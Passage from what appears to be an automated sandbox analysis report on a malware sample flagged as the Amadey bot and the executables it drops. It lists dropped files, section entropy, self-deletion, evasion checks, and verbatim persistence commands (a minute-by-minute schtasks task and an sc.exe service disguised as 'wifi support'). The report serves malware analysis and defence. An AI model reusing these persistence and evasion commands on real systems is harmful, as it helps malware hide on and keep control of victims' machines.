                          Source: C:\Users\user\AppData\Roaming\gdrgbdjCode function: 6_2_00402E94 push es; iretd
                          Source: C:\Users\user\AppData\Roaming\gdrgbdjCode function: 6_1_00402E94 push es; iretd
                          Source: C:\Users\user\AppData\Local\Temp\1E7F.exeCode function: 7_2_00412CA4 push eax; ret
                          Source: C:\Users\user\AppData\Local\Temp\1E7F.exeCode function: 7_2_0047127E push edi; iretd
                          Source: C:\Users\user\AppData\Local\Temp\1E7F.exeCode function: 7_2_0047123C push edi; iretd
                          Source: C:\Users\user\AppData\Local\Temp\1E7F.exeCode function: 7_2_0047735E push esp; iretd
                          Source: C:\Users\user\AppData\Local\Temp\1E7F.exeCode function: 7_2_004753C8 pushfd ; retf
                          Source: C:\Users\user\AppData\Local\Temp\2DB3.exeCode function: 8_2_004139B0 push eax; ret
                          Source: C:\Users\user\AppData\Local\Temp\2DB3.exeCode function: 8_2_00932A9B push ebx; ret
                          Source: C:\Users\user\AppData\Local\Temp\2DB3.exeCode function: 8_2_009356F0 pushad ; ret
                          Source: C:\Users\user\AppData\Local\Temp\2DB3.exeCode function: 8_2_00936183 pushfd ; ret
                          Source: C:\Users\user\AppData\Local\Temp\2DB3.exeCode function: 8_2_00936151 pushfd ; ret
                          Source: C:\Users\user\AppData\Local\Temp\3F71.exeCode function: 13_2_00138508 push 00000028h; retf 0000h
                          Source: C:\Users\user\AppData\Local\Temp\3F71.exeCode function: 13_2_0013764A push esp; ret
                          Source: C:\Users\user\AppData\Local\Temp\3F71.exeCode function: 13_2_00B54003 push esi; retf
                          Source: C:\Users\user\AppData\Local\Temp\3F71.exeCode function: 13_2_025BCF78 pushfd ; retf
                          Source: C:\Users\user\AppData\Local\Temp\3F71.exeCode function: 13_2_025BCF38 pushad ; retf
                          Source: C:\Users\user\Desktop\zmbGUZTICp.exeCode function: 0_2_00435670 LoadLibraryA,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__encode_pointer,__encode_pointer,__encode_pointer,__encode_pointer,__encode_pointer,
                          Source: 3F71.exe.2.drStatic PE information: 0xA22A793F [Sun Mar 19 11:55:43 2056 UTC]
                          Source: zmbGUZTICp.exeStatic PE information: section name: .zug
                          Source: zmbGUZTICp.exeStatic PE information: section name: .nafuti
                          Source: zmbGUZTICp.exeStatic PE information: section name: .karom
                          Source: 2DB3.exe.2.drStatic PE information: section name: .gave
                          Source: 2DB3.exe.2.drStatic PE information: section name: .noduf
                          Source: 2DB3.exe.2.drStatic PE information: section name: .gafal
                          Source: 309C.exe.2.drStatic PE information: section name: .nife
                          Source: 309C.exe.2.drStatic PE information: section name: .kiza
                          Source: 309C.exe.2.drStatic PE information: section name: .lagoti
                          Source: BC16.exe.2.drStatic PE information: section name: .gizi
                          Source: BC16.exe.2.drStatic PE information: section name: .bur
                          Source: BC16.exe.2.drStatic PE information: section name: .wob
                          Source: D452.exe.2.drStatic PE information: section name:
                          Source: D452.exe.2.drStatic PE information: section name:
                          Source: D452.exe.2.drStatic PE information: section name:
                          Source: D452.exe.2.drStatic PE information: section name:
                          Source: D452.exe.2.drStatic PE information: section name:
                          Source: D452.exe.2.drStatic PE information: section name:
                          Source: D452.exe.2.drStatic PE information: section name: .28gybOo
                          Source: D452.exe.2.drStatic PE information: section name: .adata
                          Source: 239.exe.2.drStatic PE information: section name:
                          Source: 239.exe.2.drStatic PE information: section name:
                          Source: 239.exe.2.drStatic PE information: section name:
                          Source: 239.exe.2.drStatic PE information: section name:
                          Source: 239.exe.2.drStatic PE information: section name:
                          Source: 239.exe.2.drStatic PE information: section name:
                          Source: 239.exe.2.drStatic PE information: section name: .28gybOo
                          Source: 239.exe.2.drStatic PE information: section name: .adata
                          Source: 2D04.exe.2.drStatic PE information: section name: .didata
                          Source: gdrgbdj.2.drStatic PE information: section name: .zug
                          Source: gdrgbdj.2.drStatic PE information: section name: .nafuti
                          Source: gdrgbdj.2.drStatic PE information: section name: .karom
                          Source: tejjnepq.exe.11.drStatic PE information: section name: .nife
                          Source: tejjnepq.exe.11.drStatic PE information: section name: .kiza
                          Source: tejjnepq.exe.11.drStatic PE information: section name: .lagoti
                          Source: initial sampleStatic PE information: section where entry point is pointing to: .didata
                          Source: 3F71.exe.2.drStatic PE information: real checksum: 0x0 should be: 0x9011f
                          Source: D452.exe.2.drStatic PE information: real checksum: 0x3721bb should be: 0x373654
                          Source: 239.exe.2.drStatic PE information: real checksum: 0x3721bb should be: 0x373654
                          Source: initial sampleStatic PE information: section name: .text entropy: 6.95435391538
                          Source: initial sampleStatic PE information: section name: .text entropy: 6.98468263043
                          Source: initial sampleStatic PE information: section name: .text entropy: 6.966095877
                          Source: initial sampleStatic PE information: section name: .text entropy: 7.2566886804
                          Source: initial sampleStatic PE information: section name: entropy: 7.99714766582
                          Source: initial sampleStatic PE information: section name: entropy: 7.90784224501
                          Source: initial sampleStatic PE information: section name: entropy: 7.99361781473
                          Source: initial sampleStatic PE information: section name: entropy: 7.80912989946
                          Source: initial sampleStatic PE information: section name: .rsrc entropy: 7.22348700263
                          Source: initial sampleStatic PE information: section name: .28gybOo entropy: 7.91849564721
                          Source: initial sampleStatic PE information: section name: entropy: 7.99714766582
                          Source: initial sampleStatic PE information: section name: entropy: 7.90784224501
                          Source: initial sampleStatic PE information: section name: entropy: 7.99361781473
                          Source: initial sampleStatic PE information: section name: entropy: 7.80912989946
                          Source: initial sampleStatic PE information: section name: .rsrc entropy: 7.22348700263
                          Source: initial sampleStatic PE information: section name: .28gybOo entropy: 7.91849564721
                          Source: initial sampleStatic PE information: section name: .didata entropy: 7.99713235918
                          Source: initial sampleStatic PE information: section name: .text entropy: 6.95435391538
                          Source: initial sampleStatic PE information: section name: .text entropy: 6.966095877
                          Source: 3F71.exe.2.dr, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csHigh entropy of concatenated method names: '.cctor', 'H5FjWI2qLA', 'HImHehMQs', 'OdTftVXgR', 'fBSIsFavs', 'lVvm2jc63', 'QkuggS1X8', 'q9NYFG9Ki', 'Obt8dgGDf', '.ctor'
                          Source: 3F71.exe.2.dr, A8rKktAdECkdokFCxq/I6976P597uOR8TGW3o.csHigh entropy of concatenated method names: 'PeB1xOW8Qv', 'eBxqprrF8', 'GOp1yJ6bgm', '.ctor', 'omeIBPs3wW', '.cctor', 'rvDbN6CZxdYVCYIgtN', 'LLL4M7JwFWGFTFjvp5', 'rHoI7BQHjq86lsr1Cq', 'uFomUGkb7RPvkdQrlH'
                          Source: 13.2.3F71.exe.130000.0.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csHigh entropy of concatenated method names: '.cctor', 'H5FjWI2qLA', 'HImHehMQs', 'OdTftVXgR', 'fBSIsFavs', 'lVvm2jc63', 'QkuggS1X8', 'q9NYFG9Ki', 'Obt8dgGDf', '.ctor'
                          Source: 13.2.3F71.exe.130000.0.unpack, A8rKktAdECkdokFCxq/I6976P597uOR8TGW3o.csHigh entropy of concatenated method names: 'PeB1xOW8Qv', 'eBxqprrF8', 'GOp1yJ6bgm', '.ctor', 'omeIBPs3wW', '.cctor', 'rvDbN6CZxdYVCYIgtN', 'LLL4M7JwFWGFTFjvp5', 'rHoI7BQHjq86lsr1Cq', 'uFomUGkb7RPvkdQrlH'
                          Source: 13.0.3F71.exe.130000.1.unpack, A8rKktAdECkdokFCxq/I6976P597uOR8TGW3o.csHigh entropy of concatenated method names: 'PeB1xOW8Qv', 'eBxqprrF8', 'GOp1yJ6bgm', '.ctor', 'omeIBPs3wW', '.cctor', 'rvDbN6CZxdYVCYIgtN', 'LLL4M7JwFWGFTFjvp5', 'rHoI7BQHjq86lsr1Cq', 'uFomUGkb7RPvkdQrlH'
                          Source: 13.0.3F71.exe.130000.1.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csHigh entropy of concatenated method names: '.cctor', 'H5FjWI2qLA', 'HImHehMQs', 'OdTftVXgR', 'fBSIsFavs', 'lVvm2jc63', 'QkuggS1X8', 'q9NYFG9Ki', 'Obt8dgGDf', '.ctor'
                          Source: 13.0.3F71.exe.130000.3.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csHigh entropy of concatenated method names: '.cctor', 'H5FjWI2qLA', 'HImHehMQs', 'OdTftVXgR', 'fBSIsFavs', 'lVvm2jc63', 'QkuggS1X8', 'q9NYFG9Ki', 'Obt8dgGDf', '.ctor'
                          Source: 13.0.3F71.exe.130000.3.unpack, A8rKktAdECkdokFCxq/I6976P597uOR8TGW3o.csHigh entropy of concatenated method names: 'PeB1xOW8Qv', 'eBxqprrF8', 'GOp1yJ6bgm', '.ctor', 'omeIBPs3wW', '.cctor', 'rvDbN6CZxdYVCYIgtN', 'LLL4M7JwFWGFTFjvp5', 'rHoI7BQHjq86lsr1Cq', 'uFomUGkb7RPvkdQrlH'
                          Source: 13.0.3F71.exe.130000.2.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csHigh entropy of concatenated method names: '.cctor', 'H5FjWI2qLA', 'HImHehMQs', 'OdTftVXgR', 'fBSIsFavs', 'lVvm2jc63', 'QkuggS1X8', 'q9NYFG9Ki', 'Obt8dgGDf', '.ctor'
                          Source: 13.0.3F71.exe.130000.2.unpack, A8rKktAdECkdokFCxq/I6976P597uOR8TGW3o.csHigh entropy of concatenated method names: 'PeB1xOW8Qv', 'eBxqprrF8', 'GOp1yJ6bgm', '.ctor', 'omeIBPs3wW', '.cctor', 'rvDbN6CZxdYVCYIgtN', 'LLL4M7JwFWGFTFjvp5', 'rHoI7BQHjq86lsr1Cq', 'uFomUGkb7RPvkdQrlH'
                          Source: 28.0.3F71.exe.fa0000.11.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csHigh entropy of concatenated method names: '.cctor', 'H5FjWI2qLA', 'HImHehMQs', 'OdTftVXgR', 'fBSIsFavs', 'lVvm2jc63', 'QkuggS1X8', 'q9NYFG9Ki', 'Obt8dgGDf', '.ctor'
                          Source: 28.0.3F71.exe.fa0000.11.unpack, A8rKktAdECkdokFCxq/I6976P597uOR8TGW3o.csHigh entropy of concatenated method names: 'PeB1xOW8Qv', 'eBxqprrF8', 'GOp1yJ6bgm', '.ctor', 'omeIBPs3wW', '.cctor', 'rvDbN6CZxdYVCYIgtN', 'LLL4M7JwFWGFTFjvp5', 'rHoI7BQHjq86lsr1Cq', 'uFomUGkb7RPvkdQrlH'

                          Persistence and Installation Behavior:

                          barindex
                          Yara detected Amadey botShow sources
                          Source: Yara matchFile source: dump.pcap, type: PCAP
                          Source: Yara matchFile source: 00000024.00000002.645388633.0000000000712000.00000004.00000001.sdmp, type: MEMORY
                          Drops executables to the windows directory (C:\Windows) and starts themShow sources
                          Source: unknownExecutable created and started: C:\Windows\SysWOW64\ozuqupbe\tejjnepq.exe
                          Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\gdrgbdjJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\A7F0.exeFile created: C:\Users\user\AppData\LocalLow\sG8rM8v\lgpllibs.dllJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\A7F0.exeFile created: C:\Users\user\AppData\LocalLow\sG8rM8v\ldap60.dllJump to dropped file
                          Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\gdrgbdjJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\A7F0.exeFile created: C:\Users\user\AppData\LocalLow\sG8rM8v\nssdbm3.dllJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\A7F0.exeFile created: C:\Users\user\AppData\LocalLow\sG8rM8v\breakpadinjector.dllJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\A7F0.exeFile created: C:\Users\user\AppData\LocalLow\sG8rM8v\AccessibleHandler.dllJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\A7F0.exeFile created: C:\Users\user\AppData\LocalLow\sG8rM8v\ucrtbase.dllJump to dropped file
                          Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\D452.exeJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\A7F0.exeFile created: C:\Users\user\AppData\LocalLow\sG8rM8v\MapiProxy.dllJump to dropped file
                          Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\239.exeJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\A7F0.exeFile created: C:\Users\user\AppData\LocalLow\sG8rM8v\vcruntime140.dllJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\A7F0.exeFile created: C:\Users\user\AppData\LocalLow\sG8rM8v\prldap60.dllJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\A7F0.exeFile created: C:\Users\user\AppData\LocalLow\sG8rM8v\MapiProxy_InUse.dllJump to dropped file
                          Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\2DB3.exeJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\A7F0.exeFile created: C:\Users\user\AppData\LocalLow\sG8rM8v\ldif60.dllJump to dropped file
                          Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\2D04.exeJump to dropped file
                          Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\3F71.exeJump to dropped file
                          Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\1D34.exeJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\A7F0.exeFile created: C:\Users\user\AppData\LocalLow\sG8rM8v\qipcap.dllJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\309C.exeFile created: C:\Users\user\AppData\Local\Temp\tejjnepq.exeJump to dropped file
                          Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\BC16.exeJump to dropped file
                          Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\A7F0.exeJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\A7F0.exeFile created: C:\Users\user\AppData\LocalLow\sG8rM8v\libEGL.dllJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\A7F0.exeFile created: C:\Users\user\AppData\LocalLow\sG8rM8v\freebl3.dllJump to dropped file
                          Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Windows\SysWOW64\ozuqupbe\tejjnepq.exe (copy)Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\A7F0.exeFile created: C:\Users\user\AppData\LocalLow\sG8rM8v\AccessibleMarshal.dllJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\A7F0.exeFile created: C:\Users\user\AppData\LocalLow\sG8rM8v\IA2Marshal.dllJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\A7F0.exeFile created: C:\Users\user\AppData\LocalLow\sG8rM8v\softokn3.dllJump to dropped file
                          Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\1E7F.exeJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\A7F0.exeFile created: C:\Users\user\AppData\LocalLow\sqlite3.dllJump to dropped file
                          Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\309C.exeJump to dropped file
                          Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Windows\SysWOW64\ozuqupbe\tejjnepq.exe (copy)Jump to dropped file

                          Boot Survival:

                          barindex
                          Uses schtasks.exe or at.exe to add and modify task schedulesShow sources
                          Source: C:\Users\user\AppData\Local\Temp\82aa4a6c48\mjlooy.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN mjlooy.exe /TR "C:\Users\user\AppData\Local\Temp\82aa4a6c48\mjlooy.exe" /F
                          Source: C:\Windows\SysWOW64\svchost.exeRegistry key value modified: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\ozuqupbe
                          Source: C:\Users\user\AppData\Local\Temp\309C.exeProcess created: C:\Windows\SysWOW64\sc.exe C:\Windows\System32\sc.exe" create ozuqupbe binPath= "C:\Windows\SysWOW64\ozuqupbe\tejjnepq.exe /d\"C:\Users\user\AppData\Local\Temp\309C.exe\"" type= own start= auto DisplayName= "wifi support
                          Source: C:\Users\user\AppData\Local\Temp\309C.exeCode function: 11_2_00409A6B EntryPoint,SetErrorMode,SetErrorMode,SetErrorMode,SetUnhandledExceptionFilter,GetModuleHandleA,GetModuleFileNameA,GetCommandLineA,lstrlenA,ExitProcess,GetTempPathA,lstrcpyA,lstrcatA,lstrcatA,GetFileAttributesExA,DeleteFileA,GetEnvironmentVariableA,lstrcpyA,lstrlenA,RegOpenKeyExA,RegSetValueExA,RegCloseKey,GetModuleHandleA,GetModuleFileNameA,GetDriveTypeA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,wsprintfA,lstrcatA,lstrcatA,CreateProcessA,DeleteFileA,GetModuleHandleA,GetModuleFileNameA,GetDriveTypeA,GetCommandLineA,lstrlenA,StartServiceCtrlDispatcherA,DeleteFileA,GetLastError,Sleep,DeleteFileA,CreateThread,CreateThread,WSAStartup,CreateThread,Sleep,Sleep,GetTickCount,GetTickCount,GetTickCount,Sleep,

                          Hooking and other Techniques for Hiding and Protection:

                          barindex
                          Deletes itself after installationShow sources
                          Source: C:\Windows\explorer.exeFile deleted: c:\users\user\desktop\zmbguzticp.exeJump to behavior
                          Hides that the sample has been downloaded from the Internet (zone.identifier)Show sources
                          Source: C:\Windows\explorer.exeFile opened: C:\Users\user\AppData\Roaming\gdrgbdj:Zone.Identifier read attributes | delete
                          Source: C:\Users\user\AppData\Local\Temp\2DB3.exeCode function: 8_2_0040C2E0 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,
                          Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\309C.exeProcess information set: NOGPFAULTERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\309C.exeProcess information set: NOGPFAULTERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\309C.exeProcess information set: NOGPFAULTERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\309C.exeProcess information set: NOGPFAULTERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\309C.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\309C.exeProcess information set: NOGPFAULTERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\309C.exeProcess information set: NOGPFAULTERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\309C.exeProcess information set: NOGPFAULTERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\309C.exeProcess information set: NOGPFAULTERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\3F71.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\3F71.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\3F71.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\3F71.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\3F71.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\3F71.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\3F71.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\3F71.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\3F71.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\3F71.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\3F71.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\3F71.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\3F71.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\3F71.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\3F71.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\3F71.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\3F71.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\3F71.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\3F71.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\3F71.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\3F71.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\3F71.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\3F71.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\ozuqupbe\tejjnepq.exeProcess information set: NOGPFAULTERRORBOX
                          Source: C:\Windows\SysWOW64\ozuqupbe\tejjnepq.exeProcess information set: NOGPFAULTERRORBOX
                          Source: C:\Windows\SysWOW64\netsh.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\netsh.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOX
                          Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\3F71.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\3F71.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\3F71.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\3F71.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\3F71.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\3F71.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\3F71.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\3F71.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\3F71.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\3F71.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\3F71.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\3F71.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\3F71.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\3F71.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\3F71.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\3F71.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\3F71.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\3F71.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\3F71.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\3F71.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\3F71.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\3F71.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\3F71.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\3F71.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\3F71.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\3F71.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\3F71.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\3F71.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\3F71.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\3F71.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\3F71.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\3F71.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\3F71.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\3F71.exeProcess information set: NOOPENFILEERRORBOX

                          Malware Analysis System Evasion:

                          barindex
                          Found evasive API chain (may stop execution after checking mutex)Show sources
                          Source: C:\Users\user\AppData\Local\Temp\2DB3.exeEvasive API call chain: CreateMutex,DecisionNodes,Sleep
                          Tries to evade analysis by execution special instruction which cause usermode exceptionShow sources
                          Source: C:\Users\user\AppData\Local\Temp\2D04.exeSpecial instruction interceptor: First address: 0000000001184D4A instructions 0F0B caused by: Known instruction #UD exception
                          Source: C:\Users\user\AppData\Local\Temp\2D04.exeSpecial instruction interceptor: First address: 000000000118786A instructions 0F3F070BC745FCFFFFFFFF33C033D2 caused by: Unknown instruction #UD exception
                          Source: C:\Users\user\AppData\Local\Temp\2D04.exeSpecial instruction interceptor: First address: 000000000118E94A instructions 0F3F070BC745FCFFFFFFFF33C033D2 caused by: Unknown instruction #UD exception
                          Source: C:\Users\user\AppData\Local\Temp\2D04.exeSpecial instruction interceptor: First address: 000000000118D6F3 instructions 0F0B caused by: Known instruction #UD exception
                          Source: C:\Users\user\AppData\Local\Temp\2D04.exeSpecial instruction interceptor: First address: 0000000001196BA2 instructions 0F0B caused by: Known instruction #UD exception
                          Source: C:\Users\user\AppData\Local\Temp\2D04.exeSpecial instruction interceptor: First address: 0000000001197440 instructions 0F0B caused by: Known instruction #UD exception
                          Source: C:\Users\user\AppData\Local\Temp\2D04.exeSpecial instruction interceptor: First address: 000000000118CA3D instructions 0F0B caused by: Known instruction #UD exception
                          Source: C:\Users\user\AppData\Local\Temp\2D04.exeSpecial instruction interceptor: First address: 0000000001331147 instructions 0F0B caused by: Known instruction #UD exception
                          Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
                          Source: gdrgbdj, 00000006.00000002.462563738.000000000048B000.00000004.00000020.sdmpBinary or memory string: ASWHOOK
                          Found evasive API chain (may stop execution after checking locale)Show sources
                          Source: C:\Users\user\AppData\Local\Temp\2DB3.exeEvasive API call chain: GetUserDefaultLangID, ExitProcess
                          Tries to detect virtualization through RDTSC time measurementsShow sources
